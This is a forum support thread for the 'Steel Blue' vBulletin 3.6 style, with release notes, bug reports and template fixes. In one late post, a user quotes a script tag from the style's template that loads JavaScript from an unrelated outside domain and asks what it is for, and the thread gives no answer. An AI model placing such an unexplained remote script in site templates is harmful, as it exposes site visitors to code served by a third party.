PDA

View Full Version : Steel Blue 3.6.x


kall
15 Sep 2006, 09:49
Steel Blue - The first in the Steel Series from the team at vBEnhanced.com.

Style Name: Steel Blue for vB 3.6.1/2/3/4/5/6/7
Style Version: 3.6.7

Features:

Forum Status Icons Horizontal
Rounded top and bottom corners
Easily configured Javascript counter displaying time since forum launch on Forum Home
Greeting conditional on day of week and time of day
Custom statusicon, buttons and several misc images
Some SEO elements (from T2Dman's most excellent seo vBulletin (http://forum.time2dine.co.nz/seo-vbulletin/search-engine-optimize-vbulletin-98.html) hack.) in the navbar.


I will NOT provide support for the removal of features of this style. If you want to remove things, look in the relevant templates and remove them.

Customised statusicon, buttons/misc and gradients folders included.

***Additional Instructions***

vBAdvanced Users: Put nzb_greeting and nzb_greeting2 in the globalized variables section of your vBA AdminCP - Default Settings.

To change the 'Launch date' ticker on Forum Home

Look in the FORUMHOME template, near the bottom. There is a start date field. :)

setcountup(2005,10,03)

Change the date in YYYY,MM,DD format.

To change the greetings that appear in the navbar,

Have a look in your Steel Style - Navbar Greeting plugin.

To have the Forum images show up for selected forums

Go into your forumhome_forumbit_level*_post templates (both level1 and level2) and look for the condtitional that reads:

<if condition="in_array($forum['forumid'], array(4,999)">

Change these ids to the forumids of the Forums you want to display images for. (These images are not supplied. 4.gif is an example. You must make your own images.)

Further on in the same template is this conditional:

<if condition="!in_array($bbuserinfo[usergroupid], array(1,3,4,8))">

The array contains those Usergroup ids that we do NOT want to see the Start New Thread button.

Oh, and it's XHTML Compliant. And the CSS is compliant too. :) https://www.vbulletin.org/forum/external/2010/10/30.jpg

For more colours (Red/Green/Purple)/Support/Brand Free Option - www.vbenhanced.com

You may NOT remove or alter the copyright phrase in the footer.

Updates
1.01 - 16/09/2006 - Corrected panel and panelsurround URLs. Inserted viewtopic.gif.


(If you want support, you better have clicked INSTALL...I *can* see this you know.)

gothicuser
15 Sep 2006, 10:49
Erm...... where to download ?????

kall
15 Sep 2006, 11:14
D'oh!

Must have forgotten! :o

speedoleague
15 Sep 2006, 11:30
Can you take a look here, for some reason CMPS is using diffferent colours than the rest of the forum!!

http://forum.speedoleague.org.uk/

speedoleague
15 Sep 2006, 11:34
Also says this template is out of date:

postbit_legacy

speedoleague
15 Sep 2006, 12:54
It also seems to be looking for a folder in the images directory called:

steelbrightblue

speedoleague
15 Sep 2006, 13:14
I've fixed the steelbrightblue in the XML

Another issue: images/steelblue/buttons/viewpost.gif is missing

It's not included in the download

speedoleague
15 Sep 2006, 13:47
CMPS issue still can't work out why it's not working the vB default style reports the same error to the Log but the default vB style colours are correct

[Fri Sep 15 15:44:50 2006] [error] [client 62.253.128.13] File does not exist: /home/speedole/public_html/forum/images/gradients/gradient_thead.gif
[Fri Sep 15 15:44:50 2006] [error] [client 62.253.128.13] File does not exist: /home/speedole/public_html/forum/images/gradients/gradient_tcat.gif

[Fri Sep 15 15:45:59 2006] [error] [client 62.253.128.13] File does not exist: /home/speedole/public_html/forum/images/steelblue/gradients/gradient_thead.gif
[Fri Sep 15 15:45:59 2006] [error] [client 62.253.128.13] File does not exist: /home/speedole/public_html/forum/images/steelblue/gradients/gradient_tcat.gif

it should be looking in: /home/speedole/public_html/forum/forum/

It doesn't only affect CMPS it does it here to:
http://forum.speedoleague.org.uk/forum/member.php?find=lastposter&t=99

Is this just me with these issues

perfphysio
15 Sep 2006, 16:24
Can you take a look here, for some reason CMPS is using diffferent colours than the rest of the forum!!

http://forum.speedoleague.org.uk/


What template r style thing should one use to display their homepage layout like that on the forum link you have shown above. I love the left and right columns on the homepage only. It looks like I have all that stuff on my homjepage just not in that arrangement. Any assistance on that would be much appreciated

thanks a lot :cross-eyed:

speedoleague
15 Sep 2006, 18:01
I use the vbadvanced CMPS it's free and can be found here

You can arrange the Modules however you want

http://vbadvanced.com/

speedoleague
15 Sep 2006, 18:51
Seems to be a CMPS issue and I've found the fix

In the Style Manager for your styles change the following CSS settings:

Category Strips > Background

Set the full URL in my case

#5860AD url(http://forum.speedoleague.org.uk/forum/images/steelblue/gradients/gradient_tcat.gif) repeat-x top left

Then do the same for Table Header > Background and Popup Menu Controls > Background

perfphysio
15 Sep 2006, 21:52
I use the vbadvanced CMPS it's free and can be found here

You can arrange the Modules however you want

http://vbadvanced.com/

many thanks indeed:D

kall
15 Sep 2006, 22:47
It also seems to be looking for a folder in the images directory called:

steelbrightblue
Ahh, yes. I have fixed this, and added viewtopic.gif :)

I have also added a line to the install.txt regarding uploading your existing buttons, misc and statusicon folders, choosing to skip all, to make sure you have all the required images.

Regarding postbit_legacy: I had already fixed the weird logic in that line that was fixed by Jelsoft for 3.6.1. :)

Snake
16 Sep 2006, 12:43
Whoa thanks for the skin. Looks great!

Barakat
17 Sep 2006, 00:34
thanks a lot this is my favorite style at all .

beduino
20 Sep 2006, 04:22
tks kall
your styles are the best.:D
beduino
[aka joao]

pedrambayat
20 Sep 2006, 14:07
thanks

SaN-DeeP
22 Sep 2006, 17:44
You may NOT remove or alter the copyright phrase in the footer.i wanted to purchase this option from your site, but cannot register seems cpacha image is messed.. please fix

Regards,

interfx
24 Sep 2006, 00:18
great template!!! Just installed, two basic questions though...

1. Purple Fill?

When my site loads slowly, I see "purple" before the category strips load??? When I look in the template, I do not see the purple anywhere??? Any ideas? I would simply like the background of the category strips to be closer to the "teal" blue...

Anyone else figure this out?

2. Greeting?
Also where do I actually find the NavBar Gretting plugin? Can't find in Pluigins, or in my style???

To change the greetings that appear in the navbar,
Have a look in your Steel Style - Navbar Greeting plugin.

JimmyN
24 Sep 2006, 09:46
is there a screen shot or a demo link somewhere? thanks

edit: found it on your site

kall
24 Sep 2006, 09:56
is there a screen shot or a demo link somewhere? thanks

edit: found it on your site
For everyone else: http://www.vbenhanced.com/?styleid=61

:)

AzzidReign
24 Sep 2006, 15:14
Very nice skin!!

brady_44
05 Oct 2006, 14:32
I love the style and had great luck with the 3.5 version. I just upgraded my forums, hacks, etc. and uploaded this style. For whatever reasons some of the things I had no problem with before, I am having trouble with in this version.

1) The navbar and category strips have different coloring and gradients on my cmps than they do on my forums, and links pages (navbar appears purple).

2) When viewing a thread, my linkbacks dropdown menu only shows two options rather than displaying the digg, delicious, furl, and other links.

3) Certain things show up quite different in IE than they do in Firefox (mainly cmps recent threads module).

Also, I was wondering if anyone knows how to move my vbseo copyright underneath the vbenhanced copyright to balance out the footer a bit. If anyone can help with any of these issues I would certainly appreciate it. The website I am currently working on is TheMoneyPost.com (http://www.themoneypost.com). Thanks in advance, Brady.

kall
05 Oct 2006, 19:01
I love the style and had great luck with the 3.5 version. I just upgraded my forums, hacks, etc. and uploaded this style. For whatever reasons some of the things I had no problem with before, I am having trouble with in this version.

1) The navbar and category strips have different coloring and gradients on my cmps than they do on my forums, and links pages (navbar appears purple).

2) When viewing a thread, my linkbacks dropdown menu only shows two options rather than displaying the digg, delicious, furl, and other links.

3) Certain things show up quite different in IE than they do in Firefox (mainly cmps recent threads module).

Also, I was wondering if anyone knows how to move my vbseo copyright underneath the vbenhanced copyright to balance out the footer a bit. If anyone can help with any of these issues I would certainly appreciate it. The website I am currently working on is TheMoneyPost.com (http://www.themoneypost.com). Thanks in advance, Brady.
Hi Brady,

Thanks for the compliments. :)

1. Did you go into your style manager and update all of the image paths (including the gradient urls) to be Fully Qualified (eg: instead of /images/steelblue/gradients/gradient_tcat.gif - http://www.themoneypost.com/forums/images/steelblue/gradients/gradient_tcat.gif)?

2. You need to add something to the template for the vBSEO links. Please ask over at www.vbseo.com.

3. I don't know why that would be happening.. best to ask at www.vbenhanced.com.

4. You sure can move the vbeso copyright, just follow the instructions in the vBSEO install readme, insert the copyright code snippet where you want it to go, and it will go there. :)

brady_44
06 Oct 2006, 00:12
Thank you so much for the help... think I got everything figured out now. Great style and keep up the good work!

red-dna
15 Oct 2006, 00:16
cool skin

daylight
20 Oct 2006, 21:25
fantastic work , thanks ever so much.

dietcokebf2
28 Oct 2006, 14:44
Hey guys, I just want to say that this skin is -- A w e s o m e -- your all going to love it!

zınar
30 Oct 2006, 11:05
Thanks.

azjoe
30 Oct 2006, 17:07
what's the difference between the "steelblue3.6.2-style.xml" and the "steelblue3.6.2public-style.xml" styles in the zip?

Evolution06
30 Oct 2006, 23:21
How come the navbar greeting disapears after awhile? Can I fix it to keep it there all the time?

jackceltic1888
31 Oct 2006, 07:30
Is there one that will work with 3.6.0?

I willl have a look, but dont think I have seen one ;)

jackceltic1888
31 Oct 2006, 17:27
I have looked.


Could anybody tell me if there is a v3.6.0 version?

azjoe
31 Oct 2006, 19:46
I believe there's a 3.6.0 version in the download area of vbenhanced . com

GamBun
05 Nov 2006, 16:52
I am very impressed with this style. I have been hoping for one like this to replace many of my out of date styles. I am glad you have this in multiple colors. Thanks so much for sharing. I have already begun using it (you may view it with my css changes.... I have made the changes to replace old colors I had before).

THANK YOU! :)

Politika
06 Nov 2006, 16:25
Hey Call,

Is it possible to delete the white bars around those things as

Join Date:
Location:
Age:
Posts:

I'd just like to have plain text over there without the bars.

It's a great skin !

kall
06 Nov 2006, 19:06
Hey Call,

Is it possible to delete the white bars around those things as

Join Date:
Location:
Age:
Posts:

I'd just like to have plain text over there without the bars.

It's a great skin !
Hmm.. you could either edit postbit(_legacy) to remove all the instances of the css class (nzbpostbit IIRC), or edit the actual class in the Main CSS portion of your Style Manager.

The second option would be better. Just remove the border parts.

Thinkinstein
07 Nov 2006, 18:06
I have installed the zonits tags sytem. can I add a icon in the navbar beside the tag? It seems that I cant' find the tag code in navbar template.

kall
07 Nov 2006, 18:08
I have installed the zonits tags sytem. can I add a icon in the navbar beside the tag? It seems that I cant' find the tag code in navbar template.
IIRC, the modification adds the tag link on the fly, through plugins.

You would need to edit the plugin itself, ask at Zoints for assistance with that.

GamBun
12 Nov 2006, 13:42
Hey Ace, Will there be an upgrade to 3.6.3 for this awesome style? :rolleyes: I hope ;)

kall
12 Nov 2006, 17:57
Hey Ace, Will there be an upgrade to 3.6.3 for this awesome style? :rolleyes: I hope ;)
/me looks at rolleyes smiley in disgust

Well, yes... of course there is. Look at my signature for clues.

RFViet
14 Nov 2006, 19:32
You may NOT remove or alter the copyright phrase in the footer
I don't have problem with this . But It would be nice if psd file is provided !!

kall
14 Nov 2006, 21:46
It would also be nice if people knew the difference between a polite request and a rude demand.

The psd file can be found in one of the sites in my footer.

RFViet
15 Nov 2006, 02:18
It would also be nice if people knew the difference between a polite request and a rude demand.

I don't know who are you talking about, but I always respect somebody's work !!
cheer :D

Mr Peabody
15 Nov 2006, 08:01
Howdy
Installed this Style today always been one of my favs and I have a problem. I've attached a pic so you can see exactly what it is.
Cheers
Travis

kall
15 Nov 2006, 08:51
Heya Travis,

That is indeed odd. It looks like the div for the imicons has slipped out of the <td> that should be holding it.

Mr Peabody
15 Nov 2006, 09:16
Heya Travis,

That is indeed odd. It looks like the div for the imicons has slipped out of the <td> that should be holding it.

Thanks for the quick reply :)
I havent modified anything and have tried to delete and reinstall heres the code.
<if condition="$post['age']"><div class="nzbpostbit">&nbsp;$vbphrase[age]: $post[age]</div></if>
<div class="nzbpostbit">&nbsp;$vbphrase[posts]: $post[posts]
</div>
<if condition="$show['infraction']"><div class="nzbpostbit">&nbsp;$vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])</div></if>
<if condition="$show['reputation']"><if condition="$show['reppower']"><div class="nzbpostbit">&nbsp;$vbphrase[reppower]: <span id="reppower_$post[postid]_$post[userid]">$post[reppower]</span></div></if><div class="nzbpostbit">&nbsp;<span id="repdisplay_$post[postid]_$post[userid]">$post[reputationdisplay]</span></div></if>
<if condition="$post[icqicon] || $post[aimicon] || $post[msnicon] || $post[yahooicon] || $post[skypeicon]"><tr><td><div class="nzbpostbit">&nbsp;$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]</div></td></tr></if>
</div>

</td>
</tr>
</table>
Thanks again.

kall
15 Nov 2006, 09:22
Hmm...

Remove the bold part below.

<if condition="$post[icqicon] || $post[aimicon] || $post[msnicon] || $post[yahooicon] || $post[skypeicon]"><tr><td><div class="nzbpostbit">&nbsp;$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]</div></td></tr></if>
</div>

(the <tr><td> and the </td></tr> .. bolding it didnt really help). :)

Is anyone else experiencing this?

Mr Peabody
15 Nov 2006, 09:41
That fixed it cheers mate :)

GamBun
16 Nov 2006, 01:56
* kall looks at rolleyes smiley in disgust

Well, yes... of course there is. Look at my signature for clues.

That was not meant to be a rude smilie, on my part, but the idea that rolled eyes was towards myself & the fact that I would never be able to edit the xml on my own. I felt bad to ask because it is advanced enough I thought I should need to ask to be sure it would work for me... I'm sorry you took it a such.

My apologies.

Makc666
20 Nov 2006, 13:23
Hmm...

Remove the bold part below.

<if condition="$post[icqicon] || $post[aimicon] || $post[msnicon] || $post[yahooicon] || $post[skypeicon]"><tr><td><div class="nzbpostbit">&nbsp;$post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]</div></td></tr></if>
</div>

(the <tr><td> and the </td></tr> .. bolding it didnt really help). :)

Is anyone else experiencing this?

This one is a right fix! Confirm!

kall
22 Nov 2006, 03:51
That was not meant to be a rude smilie, on my part, but the idea that rolled eyes was towards myself & the fact that I would never be able to edit the xml on my own. I felt bad to ask because it is advanced enough I thought I should need to ask to be sure it would work for me... I'm sorry you took it a such.

My apologies.
Heh, sorry.. I had *just* started a thread about how much I hate it when people use a 'sarcastic' smiley when asking people for free help. :)

@Maxim: Glad to have caught it.. is anyone else experiencing this?

GamBun
23 Nov 2006, 03:30
... is anyone else experiencing this?

FYI~ Yes I have the same thing happening with the alignment being to the left instead of to the right. I'm not concerned about it looking that way though.

PaulSonny
26 Dec 2006, 11:30
Hi, I was wondering whether anybody would be willing to create some custom forum icons similar to the one attached an example, number 4?

LMK Thanks, Paul

wildo69
04 Mar 2007, 21:51
having a problem with this style.
i have made some upgrades but i cant seem to pinpoint when this broke
first i will say when i switch to another style this problems does not exist.

vB version: 3.6.5
vBE Evolution Style Product version: 1.1
Style: SteelBlue

here is the issue, it seems that multiple AJAX related items are just broke.

1.) PM To: field auto-complete gone.. just doesn't even try
2.) inline post edit, lets you edit but when you click save, it saves the post but leaves the edit window there, it does not take you back to the final post.
3.) when i fill edit and you select the "font size" and font type drop downs show weird code and at the very bottom the font sizes and types are there, but still something wrong

kall
05 Mar 2007, 04:41
Hi wildo69,

This thread is for support of the Steel Blue style.

For support of the Evolution style, please post in the Evolution Style Support forum at vbenhanced.com.

wildo69
05 Mar 2007, 22:31
thanks i'll head over there

GamBun
19 May 2007, 00:38
This is still my favorite & most well used style. I was wondering if I should be concerned about the new upgrades having any compatiblitiy issues to focus on. ~ Thanks in advance.

kall
19 May 2007, 02:39
Hi,

There were a couple of changes, namely the navbar and FORUMHOME template changes that were detailed at vBulletin.com.

I have updated the vBEnhanced Member versions of the style (see my sig), and I will see if I can get around to updating this one today. :)

alqloob alsahya
19 May 2007, 04:59
thank"s thes good desing nice

tiredoff
19 May 2007, 08:04
thank you

GamBun
20 May 2007, 15:06
Beautiful! :) Thank you for & your efforts to update it all. I greatly appreciate it! This design is the best out there!

Lottis
28 Jul 2007, 21:10
Hello, thank you fore a great style.
But the greetings produkt is missing.
And there are some templateschanges to the new upgrade. :)

Dustman
29 Jul 2007, 18:49
<td align="$stylevar[right]" style="padding-right:10px;">
<div style="position: absolute; top: 29px; right: 25px; padding: 2px;" class="panelsurround"><script type="text/javascript" language="javascript" src="http://www.qksz.net/1e-cgrl"> </script></div>
</td>

for what is this??

speedoleague
30 Jul 2007, 23:17
Any Update for 3.6.8

Red-White
29 Aug 2007, 10:01
Good morning to all you...i installed this style to a 3.6.8 vbulletin forum and i have the same problem other friends are experiencing as well!

The welcome X user is missing!

Is there any chance to have a fix for this problem?

FireFish
06 May 2008, 05:26
Any Steel Blue updates for 3.7.0?? I'm anxious & operating on a backup half-functioning template at this times.

iogames
21 May 2008, 06:51
Any Steel Blue updates for 3.7.0?? I'm anxious & operating on a backup half-functioning template at this times.

PM please

cartoonpier
26 May 2008, 23:06
nice style thanks..

Amadeusmq
30 Jan 2009, 05:49
I am certainly no expert on vbulletin or styles; however, I updated my own version of steelblue to look pretty good and work pretty well with 3.8.1.

I did the 'download' style using the default settings and attached it to this posting. Hopefully that will provide the things you all need to update to 3.8 :)

If you want to see it in action, my site is http://www.isxGames.com/forums


EDIT:
------
After posting this I realized that I'm not 100% sure that the steelblue that I have on my site is the same one that was originally on this thread (although I THINK it is) ...so, be sure to at least look at the front page of my forums to see that it matches what you have before updating.

Bison
03 Mar 2009, 02:40
I would like the version the author originally designed. Is ther going to be another upgrade to this theme?